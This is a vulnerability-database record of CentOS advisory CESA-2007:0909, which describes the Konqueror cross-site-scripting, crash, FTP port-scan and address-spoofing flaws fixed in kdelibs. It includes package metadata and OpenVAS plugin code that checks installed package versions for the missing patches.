ID CESA-2007:0909 Type centos Reporter CentOS Project Modified 2007-10-14T00:42:51
Description
CentOS Errata and Security Advisory CESA-2007:0909
The kdelibs package provides libraries for the K Desktop Environment (KDE).
Two cross-site-scripting flaws were found in the way Konqueror processes
certain HTML content. This could result in a malicious attacker presenting
misleading content to an unsuspecting user. (CVE-2007-0242, CVE-2007-0537)
A flaw was found in KDE JavaScript implementation. A web page containing
malicious JavaScript code could cause Konqueror to crash. (CVE-2007-1308)
A flaw was found in the way Konqueror handled certain FTP PASV commands.
A malicious FTP server could use this flaw to perform a rudimentary
port-scan of machines behind a user's firewall. (CVE-2007-1564)
Two Konqueror address spoofing flaws have been discovered. It was
possible for a malicious website to cause the Konqueror address bar to
display information which could trick a user into believing they are at a
different website than they actually are. (CVE-2007-3820, CVE-2007-4224)
Users of KDE should upgrade to these updated packages, which contain
backported patches to correct these issues.
{"bulletinFamily": "unix", "affectedPackage": [{"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-devel-3.3.1-9.el4.s390x.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "s390x", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.src.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.src.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-devel-3.3.1-9.el4.ia64.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "ia64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.s390x.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "s390x", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-3.5.4-13.el5.centos.x86_64.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "x86_64", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-devel-3.3.1-9.el4.s390.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "s390", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-3.5.4-13.el5.centos.i386.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "i386", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-3.5.4-13.el5.centos.i386.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "i386", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-devel-3.5.4-13.el5.centos.x86_64.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "x86_64", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.s390.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "s390", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.x86_64.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "x86_64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-apidocs-3.5.4-13.el5.centos.i386.rpm", "packageName": "kdelibs-apidocs", "operator": "lt", "arch": "i386", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-3.5.4-13.el5.centos.src.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "any", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-3.5.4-13.el5.centos.src.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "any", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-apidocs-3.5.4-13.el5.centos.x86_64.rpm", "packageName": "kdelibs-apidocs", "operator": "lt", "arch": "x86_64", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.ia64.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "ia64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-devel-3.3.1-9.el4.i386.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "i386", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.i386.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "i386", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-3.3.1-9.el4.i386.rpm", "packageName": "kdelibs", "operator": "lt", "arch": "i386", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-devel-3.5.4-13.el5.centos.i386.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "i386", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.5.4-13.el5.centos", "packageFilename": "kdelibs-devel-3.5.4-13.el5.centos.i386.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "i386", "OSVersion": "5"}, {"OS": "CentOS", "packageVersion": "3.3.1-9.el4", "packageFilename": "kdelibs-devel-3.3.1-9.el4.x86_64.rpm", "packageName": "kdelibs-devel", "operator": "lt", "arch": "x86_64", "OSVersion": "4"}], "viewCount": 2, "reporter": "CentOS Project", "references": ["https://rhn.redhat.com/errata/RHSA-2007-0909.html", "http://pasi.pirhonen.eu/", "http://steadfast.net/"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0909\n\n\nThe kdelibs package provides libraries for the K Desktop Environment (KDE).\r\n\r\nTwo cross-site-scripting flaws were found in the way Konqueror processes\r\ncertain HTML content. This could result in a malicious attacker presenting\r\nmisleading content to an unsuspecting user. (CVE-2007-0242, CVE-2007-0537)\r\n\r\nA flaw was found in KDE JavaScript implementation. A web page containing\r\nmalicious JavaScript code could cause Konqueror to crash. (CVE-2007-1308)\r\n\r\nA flaw was found in the way Konqueror handled certain FTP PASV commands.\r\nA malicious FTP server could use this flaw to perform a rudimentary\r\nport-scan of machines behind a user's firewall. (CVE-2007-1564)\r\n\r\nTwo Konqueror address spoofing flaws have been discovered. It was\r\npossible for a malicious website to cause the Konqueror address bar to\r\ndisplay information which could trick a user into believing they are at a \r\ndifferent website than they actually are. (CVE-2007-3820, CVE-2007-4224)\r\n\r\nUsers of KDE should upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026322.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026324.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026330.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026331.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026338.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026339.html\n\n**Affected packages:**\nkdelibs\nkdelibs-apidocs\nkdelibs-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0909.html", "href": "http://lists.centos.org/pipermail/centos-announce/2007-October/026322.html", "modified": "2007-10-14T00:42:51", "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:840169", "OPENVAS:65616", "OPENVAS:861369", "OPENVAS:861524", "OPENVAS:1361412562310122654", "OPENVAS:1361412562310830171", "OPENVAS:136141256231065616", "OPENVAS:1361412562310122655", "OPENVAS:840091", "OPENVAS:861439"]}, {"type": "redhat", "idList": ["RHSA-2007:0909", "RHSA-2007:0905"]}, {"type": "nessus", "idList": ["SUSE_KDELIBS3-3988.NASL", "MANDRAKE_MDKSA-2007-176.NASL", "ORACLELINUX_ELSA-2007-0905.NASL", "CENTOS_RHSA-2007-0909.NASL", "SUSE_KDELIBS3-3058.NASL", "SUSE_KDELIBS3-3053.NASL", "REDHAT-RHSA-2007-0909.NASL", "CENTOS_RHSA-2007-0905.NASL", "ORACLELINUX_ELSA-2007-0909.NASL", "SL_20071008_KDELIBS_ON_SL5_X.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0909", "ELSA-2007-0905"]}, {"type": "cve", "idList": ["CVE-2007-3820", "CVE-2007-1308", "CVE-2007-1564", "CVE-2007-4224", "CVE-2007-0242", "CVE-2007-0537"]}, {"type": "ubuntu", "idList": ["USN-452-1", "USN-502-1", "USN-447-1", "USN-420-1"]}, {"type": "centos", "idList": ["CESA-2007:0905"]}, {"type": "freebsd", "idList": ["14AD2A28-66D2-11DC-B25F-02E0185F8D72"]}, {"type": "slackware", "idList": ["SSA-2007-264-01", "SSA-2007-093-03"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7532", "SECURITYVULNS:VULN:7348"]}, {"type": "osvdb", "idList": ["OSVDB:37242", "OSVDB:37245", "OSVDB:32975", "OSVDB:35199", "OSVDB:34679"]}, {"type": "exploitdb", "idList": ["EDB-ID:29713", "EDB-ID:29770"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1292-1:E639E"]}], "modified": "2020-12-08T03:34:34", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-12-08T03:34:34", "rev": 2}, "vulnersScore": 6.9}, "id": "CESA-2007:0909", "title": "kdelibs security update", "edition": 4, "published": "2007-10-08T18:49:50", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "lastseen": "2020-12-08T03:34:34", "scheme": null}
{"openvas": [{"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "description": "Oracle Linux Local Security Checks ELSA-2007-0909", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122655", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2007-0909", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0909.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122655\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:50:22 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0909\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0909 - Moderate: kdelibs security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0909\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0909.html\");\n script_cve_id(\"CVE-2007-0242\", \"CVE-2007-0537\", \"CVE-2007-1308\", \"CVE-2007-1564\", \"CVE-2007-3820\", \"CVE-2007-4224\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.4~13.el5.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kdelibs-apidocs\", rpm:\"kdelibs-apidocs~3.5.4~13.el5.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kdelibs-devel\", rpm:\"kdelibs-devel~3.5.4~13.el5.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:56:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-3820"], "description": "Check for the Version of kdelibs", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861369", "href": "http://plugins.openvas.org/nasl.php?oid=861369", "type": "openvas", "title": "Fedora Update for kdelibs FEDORA-2007-716", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kdelibs FEDORA-2007-716\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kdelibs on Fedora Core 6\";\ntag_insight = \"Libraries for the K Desktop Environment:\n KDE Libraries included: kdecore (KDE core library), kdeui (user interface),\n kfm (file manager), khtmlw (HTML widget), kio (Input/Output, networking),\n kspell (spelling checker), jscript (javascript), kab (addressbook),\n kimgio (image manipulation)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00085.html\");\n script_id(861369);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-716\");\n script_cve_id(\"CVE-2007-4224\", \"CVE-2007-3820\");\n script_name( \"Fedora Update for kdelibs FEDORA-2007-716\");\n\n script_summary(\"Check for the Version of kdelibs\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kdelibs-devel\", rpm:\"x86_64/kdelibs-devel~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kdelibs\", rpm:\"x86_64/kdelibs~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/kdelibs-debuginfo\", rpm:\"x86_64/debug/kdelibs-debuginfo~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kdelibs-apidocs\", rpm:\"x86_64/kdelibs-apidocs~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/kdelibs-debuginfo\", rpm:\"i386/debug/kdelibs-debuginfo~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kdelibs-apidocs\", rpm:\"i386/kdelibs-apidocs~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kdelibs-devel\", rpm:\"i386/kdelibs-devel~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kdelibs\", rpm:\"i386/kdelibs~3.5.7~1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564", "CVE-2007-0537"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011006 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065616", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065616", "type": "openvas", "title": "SLES9: Security update for kdelibs3", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5011006.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011006 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65616\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-0537\", \"CVE-2007-1564\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.2.1~44.69\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564", "CVE-2007-0537"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011006 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65616", "href": "http://plugins.openvas.org/nasl.php?oid=65616", "type": "openvas", "title": "SLES9: Security update for kdelibs3", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5011006.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011006 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65616);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-0537\", \"CVE-2007-1564\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.2.1~44.69\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:28:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564", "CVE-2007-1308"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-447-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840091", "href": "http://plugins.openvas.org/nasl.php?oid=840091", "type": "openvas", "title": "Ubuntu Update for kdelibs vulnerabilities USN-447-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_447_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for kdelibs vulnerabilities USN-447-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Konqueror did not correctly handle iframes from\n JavaScript. If a user were tricked into visiting a malicious website,\n Konqueror could crash, resulting in a denial of service. (CVE-2007-1308)\n\n A flaw was discovered in how Konqueror handled PASV FTP responses. If a\n user were tricked into visiting a malicious FTP server, a remote\n attacker could perform a port-scan of machines within the user's\n network, leading to private information disclosure. (CVE-2007-1564)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-447-1\";\ntag_affected = \"kdelibs vulnerabilities on Ubuntu 5.10 ,\n Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-447-1/\");\n script_id(840091);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"447-1\");\n script_cve_id(\"CVE-2007-1308\", \"CVE-2007-1564\");\n script_name( \"Ubuntu Update for kdelibs vulnerabilities USN-447-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", 